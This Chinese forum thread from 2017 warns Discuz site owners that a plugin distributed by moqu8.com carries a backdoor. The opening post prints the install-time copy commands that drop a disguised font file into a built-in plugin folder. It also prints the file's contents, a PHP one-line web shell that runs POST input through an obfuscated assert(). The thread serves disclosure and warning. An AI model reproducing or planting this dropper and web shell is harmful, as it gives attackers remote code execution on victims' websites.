忘记密码?

一键登录

草根吧源码论坛

揭秘魔趣吧moqu8.com传播木马过程以及证据,玩discuz的希望都看看

查看: 309|回复: 7

[交流] 揭秘魔趣吧moqu8.com传播木马过程以及证据,玩discuz的希望都看看

[复制链接]

1

主题

11

热度

0

贡献

步入草根

Rank: 1

发表于 2017-10-18 22:14:55 | 显示全部楼层 |阅读模式 | 百度  360  谷歌 
分享到:
揭秘整个过程视频观看地址:
http://www.iqiyi.com/w_19rvbcv5vx.html
http://v.youku.com/v_show/id_XMzA5NDEyMDA2NA==.html
http://my.tv.sohu.com/us/326324566/93860557.shtml
请大家扩散出去,避免更多的无辜站长受害!

下面是录视频记录的内容

大家好,今天想下载一个资源,于是搜到了垃圾网站.魔趣吧
下载下来发现存在后门木马.严重威胁各位作网站的同行安全问题
今天我就来揭露该垃圾的嘴脸,希望不要有更多的站长被木马控制

http://www.moqu8.com/thread-7820-1-1.html
这是我们今天用来揭谜的帖子资源(其他的就不一一看了,因为我就是找这个资源找到这个垃圾网站的.差点被控制

我们先下载下来看看

MD5: 5165668B431963D971E14B19FB61959A
SHA1: 3BB656B048CD07A502D318EE58526E51D039A77B
CRC32: 4E12378A

附件信息
注意MD5 如果大家需要验证我说的是否真假验证MD5就可以防止我揭密后 被该垃圾站长修改了附件

木马的运行是一安装就注入了

require_once 'config/check.php';

copy(DISCUZ_ROOT.'source/plugin/'.$pluginarray['plugin']['identifier'].'/template/2.ttf',DISCUZ_ROOT.authcode('ca70pfWYubcn95qp9nCqz6i0TnMyEcZy3x1C85BwFgMtQ0Axj037kgspR6gporNzAtTMxC1q+1ovgZfdm3gr5negoq72+sdM/kmrFDy9','DECODE','addon'));
我们随便解密一段代码看看
copy(DISCUZ_ROOT.'source/plugin/wq_buluo/template/2.ttf',DISCUZ_ROOT.'./source/plugin/manyou/Service/Server/Sclouds.php');

翻译下得出

复制文件source/plugin/wq_buluo/template/2.ttf到/source/plugin/manyou/Service/Server/Sclouds.php

我们接下来看看2.ttf是个什么东西
<?php   
error_reporting(0);  
if($_POST['id']){  如果POST id不为空则运行下面的代码
$str='aert';
$e=trim($str,'ert').str_repeat('s',2).trim($str,'art').trim($str,'aet').trim($str,'aer');
assert($_POST['id']);//一句话木马
}else{否则返回404
header('HTTP/1.1 404 Not Found');

}
?>
由此可见该后门木马的运行程序是 安装插件时  复制 2.ttf到系统目录plugin/manyou  这个插件是系统自带的漫游插件 后台检测不到是否被修改 如果直接加在其他系统文件 后台的文件效应能够看到 够聪明的

综上可见该网站散播后门木马是不争的事实 希望各位discuz站长能够分享出去避免让更多的无辜站长受害

打着每个亲测 无后门的幌子欺骗善良的站长 此类行为该抵制

copy(DISCUZ_ROOT.'source/plugin/'.$pluginarray['plugin']['identifier'].'/template/index.htm',DISCUZ_ROOT.authcode('4de98tRmZEiyfCOIH31Y0XaMxQAndNsnuI8LV7g3lHkCxI0DEg1HDjhMfqoOKIMP5P46bbtF7Aiz2kyvI6bK5Gm/zKHVgQk','DECODE','addon'));}else{
copy(DISCUZ_ROOT.'source/plugin/'.$pluginarray['plugin']['identifier'].'/template/index1.htm',DISCUZ_ROOT.authcode('4de98tRmZEiyfCOIH31Y0XaMxQAndNsnuI8LV7g3lHkCxI0DEg1HDjhMfqoOKIMP5P46bbtF7Aiz2kyvI6bK5Gm/zKHVgQk','DECODE','addon'));}
copy(DISCUZ_ROOT.'source/plugin/'.$pluginarray['plugin']['identifier'].'/template/1.ttf',DISCUZ_ROOT.authcode('ad35AdUSHEsWLkRwzMBl+UMWEcB4HJExecDO2x/97pJarU+VHRRZGDZnmUx2G3lmLEHH38YJNt1YZ+BRwv0sF3AU80jpA75YTBHAEesn4Q','DECODE','addon'));

这些代码解密出来意思也差不多 都市执行后门文件的注入

视频就到这里 谢谢大家观看



帖子地址: 

回复

举报

67

主题

135

热度

145

贡献

步入草根

Rank: 1

发表于 2017-10-19 08:29:25 | 显示全部楼层
DZ建站资源有求必应
不作为的站长没想到都不要脸到这个地步了,当所有站长是白眼瞎啊,其实这个魔趣吧和源码哥ymg6是一家的,一丘之貉,证据事实确凿了,站长们都看看吧。

36

主题

111

热度

10

贡献

终身赞助ViP

Rank: 7Rank: 7Rank: 7

发表于 2017-10-19 09:02:16 | 显示全部楼层
模板插件安装服务
站长你好,对于你的遭遇表示同情,外面垃圾源码站很多,大多都是后门狗、版本帝、什么传播倒卖的二手三手货,我就被坑过了,就不想回想了,想问下站长:
authcode('ad35AdUSHEsWLkRwzMBl+UMWEcB4HJExecDO2x/97pJarU+VHRRZGDZnmUx2G3lmLEHH38YJNt1YZ+BRwv0sF3AU80jpA75YTBHAEesn4Q'

这个加密是什么加密啊?怎么解密呢?

11

主题

22

热度

0

贡献

步入草根

Rank: 1

发表于 2017-10-19 10:15:58 | 显示全部楼层
没想到这么黑暗,真可恶的魔趣吧,搞不好和那个源码哥搭伙作案的。

8

主题

25

热度

0

贡献

步入草根

Rank: 1

发表于 2017-10-19 10:54:34 | 显示全部楼层
这种人一般不怕举报,估计还得意洋洋的,建议直接报网警,提交证据。

19

主题

51

热度

68

贡献

终身赞助ViP

Rank: 7Rank: 7Rank: 7

荣誉贵宾DZ专员

发表于 2017-10-19 16:37:36 | 显示全部楼层
魔趣吧、源码哥这类后门狗,站长们应该联合抵制,人人诛之~

2

主题

200

热度

14

贡献

步入草根

Rank: 1

发表于 2017-10-20 21:58:24 | 显示全部楼层
确实,源码哥那个网站的木马后门也很多,我上次在源码哥下载一个插件网站就被黑了,真是垃圾

11

主题

31

热度

0

贡献

步入草根

Rank: 1

发表于 2017-10-22 20:59:17 | 显示全部楼层
我怎么说在魔趣吧下载的资源用起来服务器怎么感觉资源老是占满,网站运行变慢的,魔趣吧玩后门这套路够深,感谢楼主举报出来了,已经全盘查毒卸载魔趣吧的东西了,垃圾货

发表回复

高级模式
您需要登录后才可以回帖 登录 | 立即注册 新浪微博登陆 用百度帐号登录 一键登录:

本版积分规则

收藏帖子 返回列表 搜索
快速回复 返回顶部 返回列表